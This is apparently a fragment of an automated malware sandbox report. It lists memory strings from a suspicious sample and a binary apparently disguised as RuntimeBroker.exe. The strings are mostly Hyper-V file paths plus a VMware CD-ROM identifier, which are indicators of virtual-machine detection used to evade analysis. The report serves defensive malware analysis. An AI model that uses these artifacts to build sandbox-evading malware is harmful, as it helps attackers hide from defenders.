Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_6d27406409f6104a\Hyper-V.Format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13\n\wshhyperv.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\nvspinfo.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\r\vmhgs.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: uC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmwp_31bf3856ad364e35_10.0.19041.1949_none_a9b86d6c1534dc66\vmwp.exe
Source: ogVinh0jhq.exe, 0000000A.00000002.1749529025.000000001BC6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\<
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-bpa_31bf3856ad364e35_10.0.19041.1_none_555170071aa29c2c.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vmms_31bf3856ad364e35_10.0.19041.2006_none_ab6b7b2814133920\r\vmms.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-vsmb_31bf3856ad364e35_10.0.19041.1741_none_a3a0448c191b2fda.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1741.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lC:\Windows\servicing\Packages\Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\vfpctrl.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_1ce7d3781003c70f\Hyper-V.Types.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-k..erformance-counters_31bf3856ad364e35_10.0.19041.1_none_e0127aac1cc27b15.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\hvloader.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\hvix64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_0544b95dbde97edc.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\r\vid.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser_31bf3856ad364e35_10.0.19041.1645_none_fe1307608fa06d8c\r\pvhdparser.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1415.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\vmswitch.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\f\hvax64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: sC:\Windows\WinSxS\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141\r\vmbkmcl.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\f\HyperVSysprepProvider.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tC:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\MSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-p..e-merged-deployment_31bf3856ad364e35_10.0.19041.1415_none_36f742b3b56a2468.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..t-remotefilebrowser_31bf3856ad364e35_10.0.19041.746_none_6fbcad1699b89a67\RemoteFileBrowse.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-winhv_31bf3856ad364e35_10.0.19041.1_none_93cc37f483916b61.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\HyperV-Compute-System-VirtualMachine-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1415.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_273c7dca4464890a\Hyper-V.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\r\hvix64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-p..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_8b1c06953b85da99.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1566.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.cmdlets.misc_31bf3856ad364e35_10.0.19041.1_none_6d27406409f6104a\Hyper-V.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..edstorage.resources_31bf3856ad364e35_10.0.19041.1_en-us_8e6d1518accc0bf5.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-pvhd-parser.resources_31bf3856ad364e35_10.0.19041.1_en-us_0ccb9f4751718744\pvhdparser.sys.mui
Source: ogVinh0jhq.exe, ITlIQtTGhEyfMRHaLp.exe.10.dr, RuntimeBroker.exe.0.dr	Binary or memory string: rJ1OvYCtIqeMUDu4mIT
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-h..oyment-languagepack_31bf3856ad364e35_10.0.19041.1_en-gb_53df9e1a6706366c.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vhd-parser_31bf3856ad364e35_10.0.19041.1_none_34b87765e20dcc15.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: }C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\f\vfpctrl.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..lebrowser.resources_31bf3856ad364e35_10.0.19041.1_en-us_4373d0692dcd3a06.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-config_31bf3856ad364e35_10.0.19041.928_none_d35bf07ab5380c24.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Common-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1566.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\servicing\Packages\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-i..ationcomponents-rdv_31bf3856ad364e35_10.0.19041.1741_none_b62736d427ac1a0c.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-hypervcluster_31bf3856ad364e35_10.0.19041.1_none_a2ace16370124ff4.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\wow64_microsoft.hyperv.powershell.misc_31bf3856ad364e35_10.0.19041.1_none_273c7dca4464890a\Hyper-V.Format.ps1xml
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vC:\Windows\servicing\Packages\Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Package-base-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1415.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: pC:\Windows\WinSxS\amd64_microsoft-hyper-v-hgs_31bf3856ad364e35_10.0.19041.1741_none_1bf0e7c12b78479b\f\vmhgs.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Hypervisor-merged-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-kmcl_31bf3856ad364e35_10.0.19041.1889_none_e7d7bde611c8c141.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\WinSxS\Manifests\amd64_microsoft-windows-hyper-v-dmvsc_31bf3856ad364e35_10.0.19041.1_none_5cb76f18a25ee556.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-h..rvisor-host-service_31bf3856ad364e35_10.0.19041.1_none_2246f2e6f0441379.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-management-clients_31bf3856ad364e35_10.0.19041.1_none_a87cce111f2d21d5.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.inf
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: wC:\Windows\servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WC:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563\vmci.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: {C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\vfpctrl.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-m..apinabout.resources_31bf3856ad364e35_10.0.19041.1_en-us_d314f4eb3925c8b5\SnapInAbout.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Offline-Core-Group-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Online-Services-merged-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.19041.1682.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-storvsp_31bf3856ad364e35_10.0.19041.1_none_cb2cd273f2fa3722.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \|C:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\r\vfpext.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-synthfcvdev_31bf3856ad364e35_10.0.19041.1741_none_b365912b94b35a98\f\vmsynthfcvdev.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\r\vmsmb.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-v..rvcluster.resources_31bf3856ad364e35_10.0.19041.1_en-gb_71570953289cd4d0.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-o..n-merged-deployment_31bf3856ad364e35_10.0.19041.1566_none_4d0af6f3ee4c927e.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zC:\Windows\WinSxS\amd64_microsoft-windows-hyper-v-vfpext_31bf3856ad364e35_10.0.19041.1741_none_7543ca68a11c7040\vfpapi.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-winsock-provider_31bf3856ad364e35_10.0.19041.867_none_b57fce26790eec13.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-m..-client.snapinabout_31bf3856ad364e35_10.0.19041.1_none_43a9017744e82ca8.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326\r\VmEmulatedStorage.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004C58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\Manifests\amd64_microsoft-hyper-v-vstack-emulatedstorage_31bf3856ad364e35_10.0.19041.1741_none_4fe99c993cb84326.manifest
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ~C:\Windows\WinSxS\amd64_microsoft-hyper-v-drivers-hypervisor_31bf3856ad364e35_10.0.19041.2006_none_a526c6e91aabcb1b\hvix64.exe
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1766.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-sysprep-provider_31bf3856ad364e35_10.0.19041.789_none_111728dc239a85e2\HyperVSysprepProvider.dll
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-HyperV-OptionalFeature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000003858000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yC:\Windows\WinSxS\amd64_microsoft-hyper-v-bpa.resources_31bf3856ad364e35_10.0.19041.1_en-us_168291f09487ebd5\Hyper-V.psd1
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xC:\Windows\servicing\Packages\Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.mum
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vsmb.resources_31bf3856ad364e35_10.0.19041.423_en-us_f14a4bbefe65ac87\vmsmb.dll.mui
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\Windows\WinSxS\amd64_microsoft-hyper-v-d..s-vmswitch-netsetup_31bf3856ad364e35_10.0.19041.2006_none_f93d3f541072d580\r\VmsProxy.sys
Source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000004258000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: rC:\Windows\WinSxS\amd64_microsoft-hyper-v-vstack-vid_31bf3856ad364e35_10.0.19041.546_none_58a869077fc6e2f7\vid.dll
